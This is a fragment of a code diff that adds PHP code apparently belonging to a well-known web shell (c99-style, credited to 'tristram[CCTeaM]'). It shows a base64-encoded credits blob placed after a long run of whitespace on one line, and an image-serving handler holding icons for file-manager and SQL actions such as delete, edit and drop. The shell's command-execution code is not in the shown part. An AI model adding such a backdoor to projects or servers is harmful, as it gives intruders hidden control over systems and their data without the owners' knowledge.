+}																																																														   $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhLCBsZWFkaW5nIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPGJyPlRoYW5rcyBhbGwgd2hvIHJlcG9ydCBidWdzLjxicj5BbGwgYnVncyBzZW5kIHRvIHRyaXN0cmFtJ3MgSUNRICM2NTY1NTUgPGEgaHJlZj0iaHR0cDovL3d3cC5pY3EuY29tL3NjcmlwdHMvY29udGFjdC5kbGw/bXNndG89NjU2NTU1Ij48aW1nIHNyYz1odHRwOi8vd3dwLmljcS5jb20vc2NyaXB0cy9vbmxpbmUuZGxsP2ljcT02NTY1NTUmaW1nPTUgYm9yZGVyPTAgYWxpZ249YWJzbWlkZGxlPjwvYT4uPC9iPiA8L2NlbnRlcj4gwOLy7vAg4vvw4Obg5fIg4evg4+7k4PDt7vHy/CDu5O3u7PMg7/Du4vMg6u7y7vD76SDu8urr/vfo6yDl4+4g7eAg7OXx//Yg7vIg6O3l8uAsIOgg5Ov/IPLu4+4g9/LuLeH7IO3lIPPs5fDl8vwg7vIg8erz6ugg7/Do+Ovu8fwg8+Pr8+Ho8vzx/yDiIO/w7uPw4Ozs6PDu4uDt6OUuIM/u5PLu6+rt8+vgIOog7eDv6PHg7ej+IOvl7fwg8SDq7vLu8O7pIP8g8+/w4OLr/+sg8eXw4uXw4OzoLjxjZW50ZXI+PGI+z/Dg4ujr4DwvYj46PC9jZW50ZXI+IDxiPsL7IOzu5uXy5SDo5+zl7f/y/CDv8O7j8ODs7PMg7+4gwuD45ezzIPPx7O7y8OXt6P4sIOzl7f/y/CDt4PHy8O7p6ugsIOTo5+Dp7S4uLiDt7iDl8evoIML7LCDz4uDm4OXs++ksIPPk4Ovo8uUg6OvoIPLl7CDh7uvl5SDo5+zl7ejy5SDq7u/o8ODp8vssIPLuIP8g4fPk8yDi++3z5uTl7SDu8u7w4uDy/CDi4Owg/+n24C4gPC9iPjxicj7A4vLu8CDt5SDt5fG48iDu8uLl8vHy4uXt7e7x8ugg5+Ag4u7n7O7m7fvpIOLw5eQsIO3g7eXxuO376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");
+if ($act == "img")
+{
+ @ob_clean();
+ 
+ $arrimg = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".
+"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",
+"edit"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_ani"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu".
+"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV".
+"EQA7",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_au"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_bat"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_bin"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_bmp"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_cat"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cnf"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgAAA/wD//wAAAANK".
+"CLqs9weESSuAMZQSiPfBBUlVIJyo8EhbJ5TTRVJvM8gaR9TGRtyZSm1T+OFau87HGKQNnlBgA5Cq".
+"Yh4vWOz6ikZFoynjSi6byQkAOw==",
+"ext_com"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_cov"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEUxDJKY+9Fr3ND/JV9lASAHCV9mHPybXay7kb4LUmILWziOiPwaB1IH5i".
+"uMVCaLGBRhOT0pQBri6mQEL3Q8py0ZwYTLE5b6Aw9lw+Y6glN2Ytt0QAADs=",
+"ext_cpc"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_cpl"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
